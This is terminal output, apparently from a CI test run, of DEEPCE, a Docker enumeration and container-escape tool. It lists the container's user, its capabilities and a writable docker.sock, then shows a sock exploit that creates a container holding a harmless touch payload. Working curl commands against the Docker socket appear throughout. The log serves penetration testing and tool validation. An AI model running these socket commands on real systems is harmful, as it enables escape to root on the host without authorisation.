
[1;90m                      ##[1;37m         .
[1;90m                ## ## ##[1;37m        ==
[1;90m             ## ## ## ##[1;37m       ===
[1;37m         /"""""""""""""""""\___/ ===
[1;34m    ~~~ [1;90m{[1;34m~~ ~~~~ ~~~ ~~~~ ~~~ ~[1;90m /  [1;37m===-[1;34m ~~~[0m
[1;90m         \______ X           __/
[1;90m           \    \         __/
[1;90m            \____\_______/[0m
          __
     ____/ /__  ___  ____  ________
    / __  / _ \/ _ \/ __ \/ ___/ _ \ [1;90m  ENUMERATE[0m
   / /_/ /  __/  __/ /_/ / (__/  __/ [1;90m ESCALATE[0m
   \__,_/\___/\___/ .___/\___/\___/[1;90m  ESCAPE[0m
                 /_/

 Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)
 by stealthcopter

[1;34m==========================================[1;32m( Colors )[1;34m==========================================[0m
[1;33m[+][1;32m Exploit Test ............ [0m[48;5;1mExploitable - Check this out[0m
[1;33m[+][1;32m Basic Test .............. [0m[1;33mPositive Result[0m
[1;33m[+][1;32m Another Test ............ [0m[1;31mError running check[0m
[1;33m[+][1;32m Negative Test ........... [0m[1;90mNo[0m
[1;33m[+][1;32m Multi line test ......... [0m[1;33mYes[0m
[1;90mCommand output
spanning multiple lines[0m

[1;90mTips will look like this and often contains links with additional info. You can usually 
ctrl+click links in modern terminal to open in a browser window
See [4mhttps://stealthcopter.github.io/deepce[0m[0m

[1;34m===================================[1;32m( Installing Packages )[1;34m====================================[0m
fetch https://dl-cdn.alpinelinux.org/alpine/v3.19/main/x86_64/APKINDEX.tar.gz
fetch https://dl-cdn.alpinelinux.org/alpine/v3.19/community/x86_64/APKINDEX.tar.gz
(1/32) Installing fstrm (0.6.1-r4)
(2/32) Installing krb5-conf (1.0-r2)
(3/32) Installing libcom_err (1.47.0-r5)
(4/32) Installing keyutils-libs (1.6.3-r3)
(5/32) Installing libverto (0.3.2-r2)
(6/32) Installing krb5-libs (1.21.2-r0)
(7/32) Installing json-c (0.17-r0)
(8/32) Installing nghttp2-libs (1.58.0-r0)
(9/32) Installing protobuf-c (1.4.1-r7)
(10/32) Installing libuv (1.47.0-r0)
(11/32) Installing xz-libs (5.4.5-r0)
(12/32) Installing libxml2 (2.11.6-r0)
(13/32) Installing bind-libs (9.18.19-r1)
(14/32) Installing bind-tools (9.18.19-r1)
(15/32) Installing ca-certificates (20230506-r0)
(16/32) Installing brotli-libs (1.1.0-r1)
(17/32) Installing c-ares (1.22.1-r0)
(18/32) Installing libunistring (1.1-r2)
(19/32) Installing libidn2 (2.3.4-r4)
(20/32) Installing libcurl (8.5.0-r0)
(21/32) Installing curl (8.5.0-r0)
(22/32) Installing libcap2 (2.69-r1)
(23/32) Installing libcap-getcap (2.69-r1)
(24/32) Installing libcap-setcap (2.69-r1)
(25/32) Installing libcap-utils (2.69-r1)
(26/32) Installing libcap (2.69-r1)
(27/32) Installing libgcc (13.2.1_git20231014-r0)
(28/32) Installing libpcap (1.10.4-r1)
(29/32) Installing pcre (8.45-r3)
(30/32) Installing libssh2 (1.11.0-r1)
(31/32) Installing libstdc++ (13.2.1_git20231014-r0)
(32/32) Installing nmap (7.94-r0)
Executing busybox-1.36.1-r15.trigger
Executing ca-certificates-20230506-r0.trigger
OK: 35 MiB in 47 packages
[1;34m===================================[1;32m( Enumerating Platform )[1;34m===================================[0m
[1;33m[+][1;32m Inside Container ........ [0m[1;33mYes[0m
[1;33m[+][1;32m Container Platform ...... [0m[1;33mdocker[0m
[1;33m[+][1;32m Container tools ......... [0m[1;31mNone[0m
[1;33m[+][1;32m User .................... [0m[48;5;1mroot[0m
[1;33m[+][1;32m Groups .................. [0m[1;90m[1;37m[48;5;1mroot[0m[1;90m bin daemon sys adm disk [1;37m[48;5;1mwheel[0m[1;90m floppy dialout tape video[0m
[1;33m[+][1;32m Sudoers ................. [0m[1;90mNo[0m
[1;33m[+][1;32m Docker Executable ....... [0m[1;90mNot Found[0m
[1;33m[+][1;32m Docker Sock ............. [0m[1;33mYes[0m
[1;37msrw-rw----    1 root     127            0 Dec 28 14:28 /var/run/docker.sock[0m
[1;33m[+][1;32m Sock is writable ........ [0m[48;5;1mYes[0m
[1;90mThe docker sock is writable, we should be able to enumerate docker, create containers 
and obtain root privs on the host machine
See [4mhttps://stealthcopter.github.io/deepce/guides/docker-sock.md[0m[0m

[1;90mTo see full info from the docker sock output run the following[0m

[1;90mcurl -s --unix-socket /var/run/docker.sock http://localhost/info[0m

[1;37mKernelVersion:6.2.0-1018-azure
OperatingSystem:Ubuntu 22.04.3 LTS
OSType:linux
Architecture:x86_64
NCPU:4
DockerRootDir:/var/lib/docker
Name:fv-az714-545
ServerVersion:24.0.7[0m
[1;33m[+][1;32m Docker Version .......... [0m[1;33m24.0.7[0m
[1;33m[+][1;32m CVE–2019–13139 .......... [0m[1;90mNo[0m
[1;33m[+][1;32m CVE–2019–5736 ........... [0m[1;90mNo[0m
[1;34m==================================[1;32m( Enumerating Container )[1;34m===================================[0m
[1;33m[+][1;32m Container ID ............ [0m[1;33m24e2014fb4d7[0m
[1;33m[+][1;32m Container Full ID ....... [0m[1;33m/[0m
[1;33m[+][1;32m Container Name .......... [0m[1;31mCould not get container name through reverse DNS[0m
[1;33m[+][1;32m Container IP ............ [0m[1;33m172.17.0.2[0m
[1;33m[+][1;32m DNS Server(s) ........... [0m[1;33m168.63.129.16 [0m
[1;33m[+][1;32m Host IP ................. [0m[1;33m172.17.0.1[0m
[1;33m[+][1;32m Operating System ........ [0m[1;90mLinux[0m
[1;33m[+][1;32m Kernel .................. [0m[1;90m6.2.0-1018-azure[0m
[1;33m[+][1;32m Arch .................... [0m[1;90mx86_64[0m
[1;33m[+][1;32m CPU ..................... [0m[1;90mAMD EPYC 7763 64-Core Processor[0m
[1;33m[+][1;32m Useful tools installed .. [0m[1;33mYes[0m
[1;90m/usr/bin/curl
/usr/bin/wget
/usr/bin/nc
/usr/bin/nslookup
/usr/bin/host
/bin/hostname
/usr/bin/dig
/usr/bin/nmap[0m
[1;33m[+][1;32m Dangerous Capabilities .. [0m[1;33mYes[0m
[1;90mCurrent: cap_chown,cap_[1;37m[48;5;1mdac_override[0m[1;90m,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,[1;37m[48;5;1mcap_mknod[0m[1;90m,cap_audit_write,cap_setfcap=ep
Bounding set =cap_chown,cap_[1;37m[48;5;1mdac_override[0m[1;90m,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,[1;37m[48;5;1mcap_mknod[0m[1;90m,cap_audit_write,cap_setfcap
Current IAB: !cap_[1;37m[48;5;1mdac_read_search[0m[1;90m,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,![1;37m[48;5;1mcap_sys_module[0m[1;90m,![1;37m[48;5;1mcap_sys_rawio[0m[1;90m,![1;37m[48;5;1mcap_sys_ptrace[0m[1;90m,!cap_sys_pacct,![1;37m[48;5;1mcap_sys_admin[0m[1;90m,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore[0m
[1;33m[+][1;32m SSHD Service ............ [0m[1;90mNo[0m
[1;33m[+][1;32m Privileged Mode ......... [0m[1;90mNo[0m
[1;33m[+][1;32m Alpine Linux Version .... [0m[1;33m3.19.0[0m
[1;33m[+][1;32m └── CVE-2019-5021 ....... [0m[1;90mNo[0m
[1;34m====================================[1;32m( Enumerating Mounts )[1;34m====================================[0m
[1;33m[+][1;32m Docker sock mounted ....... [0m[48;5;1mYes[0m
[1;90mThe docker sock is writable, we should be able to enumerate docker, create containers 
and obtain root privs on the host machine
See [4mhttps://stealthcopter.github.io/deepce/guides/docker-sock.md[0m[0m

[1;33m[+][1;32m Other mounts .............. [0m[1;33mYes[0m
[1;90m/home/runner/work/deepce/deepce/deepce.sh /root/deepce.sh rw,relatime - ext4 /dev/root rw,discard,errors=remount-ro[0m
[1;33m[+][1;32m Possible host usernames ... [0m[1;33mrunner [0m
[1;34m====================================[1;32m( Interesting Files )[1;34m=====================================[0m
[1;33m[+][1;32m Interesting environment variables ... [0m[1;90mNo[0m
[1;90mHOME=/root
HOSTNAME=24e2014fb4d7
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
SHLVL=1[0m
[1;33m[+][1;32m Any common entrypoint files ......... [0m[1;33mYes[0m
[1;90m-rwxr-xr-x    1 1001     127        38.5K Dec 28 14:30 /root/deepce.sh[0m
[1;33m[+][1;32m Interesting files in root ........... [0m[1;90mNo[0m
[1;33m[+][1;32m Passwords in common files ........... [0m[1;90mNo[0m
[1;33m[+][1;32m Home directories .................... [0m[1;90mNo[0m
[1;33m[+][1;32m Hashes in shadow file ............... [0m[1;90mNo[0m
[1;33m[+][1;32m Searching for app dirs .............. [0m
[1;34m==================================[1;32m( Enumerating Containers )[1;34m==================================[0m
[1;90mBy default containers can communicate with other containers on the same network and the 
host machine, this can be used to enumerate further[0m

[1;31m[0mTODO Enumerate container using sock[0m
[1;34m=====================================[1;32m( Exploiting Sock )[1;34m======================================[0m

[1;33m[+][1;32m Preparing Exploit [0m[1;90m [0m
[1;33m[+][1;32m Exploit Type ............. [0m[1;90mCustom Command[0m
[1;33m[+][1;32m Custom Command ........... [0m[1;90mtouch /tmp/deepce-docker-alpine-payload-command.hacked[0m
[1;33m[+][1;32m Clean up ................. [0m[1;90mAutomatic on container exit[0m

[1;33m[+][1;32m Creating container ..... [0m[1;33mce327de8c3a3602966e11b9dae9bece8c9ce3df2841f6b399fc78c08c567e300[0m
[1;33m[+][1;32m If the shell dies you can restart your listener and run the start command to fire it again [0m
[1;90mStart Command: curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/ce327de8c3a3602966e11b9dae9bece8c9ce3df2841f6b399fc78c08c567e300/start[0m
[1;90mLogs Command: curl -s --unix-socket /var/run/docker.sock "http://localhost/containers/ce327de8c3a3602966e11b9dae9bece8c9ce3df2841f6b399fc78c08c567e300/logs?stderr=1&stdout=1" --output -[0m
[1;33m[+][1;32m Once complete remember to tidy up by stopping and removing your container with following commands [0m
[1;90mStop Command: curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/ce327de8c3a3602966e11b9dae9bece8c9ce3df2841f6b399fc78c08c567e300/stop[0m
[1;90mRemove Command: curl -s -XDELETE --unix-socket /var/run/docker.sock http://localhost/containers/ce327de8c3a3602966e11b9dae9bece8c9ce3df2841f6b399fc78c08c567e300[0m
[1;33m[+][1;32m Starting container ..... [0m[1;33mSuccess[0m
[1;33m[+][1;32m Sleeping for ........... [0m[1;90m2s[0m
[1;33m[+][1;32m Fetching logs .......... [0m[1;33mSuccess[0m
[1;33m[+][1;32m Exploit completed ..... [0m[1;33m:)[0m
[1;34m===============================================[1;32m[1;34m===============================================[0m